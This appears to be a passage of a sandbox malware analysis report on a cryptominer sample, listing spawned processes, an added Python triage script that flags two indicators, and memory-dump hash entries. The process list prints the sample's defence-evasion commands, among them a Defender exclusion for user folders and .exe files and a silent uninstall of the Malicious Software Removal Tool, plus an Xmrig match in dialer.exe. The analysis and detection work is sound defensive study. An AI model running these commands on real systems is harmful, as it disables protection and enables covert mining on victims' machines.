                                                                        File size:2'870'272 bytes
                                                                        MD5 hash:4471F946569BFA17D68108068D7A17A1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Antivirus matches:
                                                                        • Detection: 100%, Avira
                                                                        • Detection: 92%, ReversingLabs
                                                                        Has exited:true

                                                                        Target ID:29
                                                                        Start time:17:41:39
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:30
                                                                        Start time:17:41:40
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:31
                                                                        Start time:17:41:40
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\lsass.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\lsass.exe
                                                                        Imagebase:0x7ff654c90000
                                                                        File size:59'456 bytes
                                                                        MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:32
                                                                        Start time:17:41:41
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:33
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\dwm.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"dwm.exe"
                                                                        Imagebase:0x7ff79d4a0000
                                                                        File size:94'720 bytes
                                                                        MD5 hash:5C27608411832C5B39BA04E33D53536C
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:34
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\cmd.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff6f0230000
                                                                        File size:289'792 bytes
                                                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:35
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:36
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:37
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:38
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:39
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:40
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:41
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\powercfg.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                                                        Imagebase:0x7ff679bb0000
                                                                        File size:96'256 bytes
                                                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:42
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:43
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff6d64d0000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:44
                                                                        Start time:17:41:42
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff765480000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:45
                                                                        Start time:17:41:43
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\dialer.exe
                                                                        Imagebase:0x7ff765480000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:46
                                                                        Start time:17:41:43
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\wusa.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                                                        Imagebase:0x7ff724960000
                                                                        File size:345'088 bytes
                                                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Target ID:47
                                                                        Start time:17:41:43
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\dialer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:dialer.exe
                                                                        Imagebase:0x7ff765480000
                                                                        File size:39'936 bytes
                                                                        MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3603906840.0000025545E42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3608696506.00000255463E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000003.2470568560.0000025545E4D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000003.2470280295.0000025545EAD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3605197071.0000025545E50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000003.3053963293.0000025545E50000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                        Has exited:false

                                                                        Target ID:48
                                                                        Start time:17:41:43
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:49
                                                                        Start time:17:41:44
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:50
                                                                        Start time:17:41:44
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:51
                                                                        Start time:17:41:45
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:52
                                                                        Start time:17:41:45
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:53
                                                                        Start time:17:41:46
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\wbem\WMIADAP.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:wmiadap.exe /F /T /R
                                                                        Imagebase:0x7ff65f200000
                                                                        File size:182'272 bytes
                                                                        MD5 hash:1BFFABBD200C850E6346820E92B915DC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:54
                                                                        Start time:17:41:47
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:55
                                                                        Start time:17:41:48
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:56
                                                                        Start time:17:41:49
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:57
                                                                        Start time:17:41:50
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:58
                                                                        Start time:17:41:50
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false

                                                                        Target ID:59
                                                                        Start time:17:41:51
                                                                        Start date:14/07/2024
                                                                        Path:C:\Windows\System32\svchost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                                                        Imagebase:0x7ff7e52b0000
                                                                        File size:55'320 bytes
                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:false
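
The process list above shows two indicators worth turning into repeatable checks: Target ID 46 removes Windows Update package KB890830 (the Malicious Software Removal Tool) with `wusa /uninstall`, and Target ID 47 is a signed System32 binary, dialer.exe, whose memory matches the Xmrig Yara rules, which only makes sense if miner code was injected into it. The following is an added example, not Joe Sandbox output or the sample's code: it parses a constructed subset of this page's own process records (the same "Key:Value" line format, trimmed to the fields the checks need) and flags both indicators. The record subset, the field names kept, and the rule names (`msrt_uninstall`, `miner_in_system_binary`) are assumptions of the example.

```python
"""Triage sandbox process records for the two indicators seen on this page.

Added example; the records below are constructed from the report's process
list (Target IDs 46, 47 and 48) and are not Joe Sandbox's own output.
"""
import re
from dataclasses import dataclass, field

# Constructed sample: three of the report's process entries, in the
# report's own "Key:Value" format, trimmed to the fields used below.
SAMPLE_RECORDS = """\
Target ID:46
Path:C:\\Windows\\System32\\wusa.exe
Commandline:wusa /uninstall /kb:890830 /quiet /norestart
Has exited:true

Target ID:47
Path:C:\\Windows\\System32\\dialer.exe
Commandline:dialer.exe
Yara matches:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000002F.00000002.3603906840.0000025545E42000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 0000002F.00000002.3586212031.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
Has exited:false

Target ID:48
Path:C:\\Windows\\System32\\svchost.exe
Commandline:C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc
Has exited:false
"""

# KB890830 is the Malicious Software Removal Tool (MSRT); uninstalling it
# removes a Microsoft-shipped malware scan from the host (defence evasion).
MSRT_KB = "890830"


@dataclass
class ProcessRecord:
    target_id: int
    path: str = ""
    commandline: str = ""
    yara_rules: list = field(default_factory=list)


def parse_records(text):
    """Split blank-line-separated "Key:Value" process entries into records."""
    records = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("Target ID:"):
            current = ProcessRecord(target_id=int(line.split(":", 1)[1]))
            records.append(current)
        elif current is None:
            continue  # ignore anything before the first Target ID
        elif line.startswith("• Rule:"):
            m = re.match(r"• Rule: ([^,]+),", line)
            if m:
                current.yara_rules.append(m.group(1))
        elif line.startswith("Path:"):
            current.path = line.split(":", 1)[1]
        elif line.startswith("Commandline:"):
            current.commandline = line.split(":", 1)[1]
    return records


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def triage(records):
    """Return (target_id, finding) pairs for the indicators in this report."""
    findings = []
    for rec in records:
        image = basename(rec.path)
        cmd = rec.commandline.lower()
        # wusa.exe removing the MSRT update (any leading zeros in the KB
        # number are tolerated; the match is case-insensitive).
        if (image == "wusa.exe" and "/uninstall" in cmd
                and re.search(r"/kb:0*%s\b" % MSRT_KB, cmd)):
            findings.append((rec.target_id, "msrt_uninstall"))
        # Miner code resident in a Microsoft binary under System32: the
        # image itself is benign, so the match implies injection/hollowing.
        miner_rules = [r for r in rec.yara_rules if "xmrig" in r.lower()]
        if miner_rules and rec.path.lower().startswith("c:\\windows\\system32\\"):
            findings.append((rec.target_id, "miner_in_system_binary"))
    return findings


if __name__ == "__main__":
    for target_id, finding in triage(parse_records(SAMPLE_RECORDS)):
        print(f"Target ID {target_id}: {finding}")
```

Run against the constructed records this reports `msrt_uninstall` for Target ID 46 and `miner_in_system_binary` for Target ID 47; the gpsvc svchost entry produces nothing. On a live host the same two conditions map to a process-creation event for wusa.exe with `/uninstall /kb:890830` on the command line and to a memory-scan hit on a System32 image that has no business containing mining code.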

                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ea64be7cb890dbae2147f8213a8049afaeecf6eb33375f751ba3339723900eb1
                                                                          • Instruction ID: 382c1333b84460fd4bfbb0203600b32e18d04d5bddc429c7359b434960a9e0df
                                                                          • Opcode Fuzzy Hash: ea64be7cb890dbae2147f8213a8049afaeecf6eb33375f751ba3339723900eb1
                                                                          • Instruction Fuzzy Hash: 95826E30A1D9098FDB98FB2CD499AA9B7E2FF58744F1041B9D40EC7296DE35EC428B41
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: =N_^
                                                                          • API String ID: 0-3908133570
                                                                          • Opcode ID: bc0ff6d1db27bc6ac6e32a875bf83ab1688fbcc0064e3ab820b7914b5341747f
                                                                          • Instruction ID: 674b03fc4d35f88ab51e3c897275befda832c0e4d970ddc5771b7f250222d8aa
                                                                          • Opcode Fuzzy Hash: bc0ff6d1db27bc6ac6e32a875bf83ab1688fbcc0064e3ab820b7914b5341747f
                                                                          • Instruction Fuzzy Hash: BD613462D0EA855FE355BA3878162F93BE1EF80264B0841BBC54CC71C3DD68690587D7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 73ea0511072df932adf62d374ec4965474167db39c92406ef543eb2457327402
                                                                          • Instruction ID: def878269b1467196b7bf387512578f92c406c54639222f0c78edc98d5b455ab
                                                                          • Opcode Fuzzy Hash: 73ea0511072df932adf62d374ec4965474167db39c92406ef543eb2457327402
                                                                          • Instruction Fuzzy Hash: 3732F871A1DA4A4FEB98EA2C94466B977E2FF98350F140179D40DC32C6EE78EC038B55
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2436627954.00007FF848BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848BA0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ba0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b7e709e1df8d6e3556dcfce0e1b88d3799b018d04f0ca0a635542cc62ffeea32
                                                                          • Instruction ID: 4da92484806ecea73e4feddbb76ef5eb473bbe5f967554c64338d17bebf50181
                                                                          • Opcode Fuzzy Hash: b7e709e1df8d6e3556dcfce0e1b88d3799b018d04f0ca0a635542cc62ffeea32
                                                                          • Instruction Fuzzy Hash: 2DD10221D0EBC55FE75AAB3C58662753FE1EF4A650F0900FBD089C70E3DA18AC498356
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 2f56a9cb63f724c44a6d4211aa6347961f03cc67852bc5d1a8ece220c8f66f15
                                                                          • Instruction ID: 713f60941643763e5f57e973cfe404539883aa0169b483877a4b455936c9cbb5
                                                                          • Opcode Fuzzy Hash: 2f56a9cb63f724c44a6d4211aa6347961f03cc67852bc5d1a8ece220c8f66f15
                                                                          • Instruction Fuzzy Hash: 37B14D31A1994E8FDF98EF5CC446AADB7E2FF68340F144569D409D7286CB74E881CB82
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ce94373eb96051eede23ddcef17e0ea1e26a90b05987786dcd2363b0ad384e36
                                                                          • Instruction ID: eda5cc8928db942dd547b0a818a51074e40909c81bf68865c283702e9bebb7a7
                                                                          • Opcode Fuzzy Hash: ce94373eb96051eede23ddcef17e0ea1e26a90b05987786dcd2363b0ad384e36
                                                                          • Instruction Fuzzy Hash: 5841E37190DB884FCB0ADB5CEC566E97FE0EB56310F04429FE049C32A2DA61A955CBD3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434055205.00007FF8489BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489BD000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff8489bd000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: e0b33a4725893dc69e9043e04923637bbbb0a36d9901d58fe7fd8a4e19f400e1
                                                                          • Instruction ID: 3cdc0777b484c4c2ef2b384899e174f9dd84b4560f3427f242e58b99cf023137
                                                                          • Opcode Fuzzy Hash: e0b33a4725893dc69e9043e04923637bbbb0a36d9901d58fe7fd8a4e19f400e1
                                                                          • Instruction Fuzzy Hash: 5C41F27180DBC44FD7569B38A845A523FF0FF52360F1506EFD088CB1A7DA25A846C7A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0f3628859ec9690b7bb3b316a2ba7ecb9b186b8d8d717f1c3fff11471482c1a0
                                                                          • Instruction ID: f860998331cd77f2983616cefb1ddc372348487a9ded52350ef057b05b94574a
                                                                          • Opcode Fuzzy Hash: 0f3628859ec9690b7bb3b316a2ba7ecb9b186b8d8d717f1c3fff11471482c1a0
                                                                          • Instruction Fuzzy Hash: EC212722B0D5490FE780FA2CA8556F677D1EFD5365F0401BBE58CC7293EE589C428395
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.2434942812.00007FF848AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AD0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_7ff848ad0000_SecuriteInfo.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dde66b0294f36b2d7634250727897470e7930e5e3e3b2384a8c8944e079c896f
                                                                          • Instruction ID: 41256067a67bbab6eea0bfcea81a3c4468105862b8408999e94eef81c12fdb57
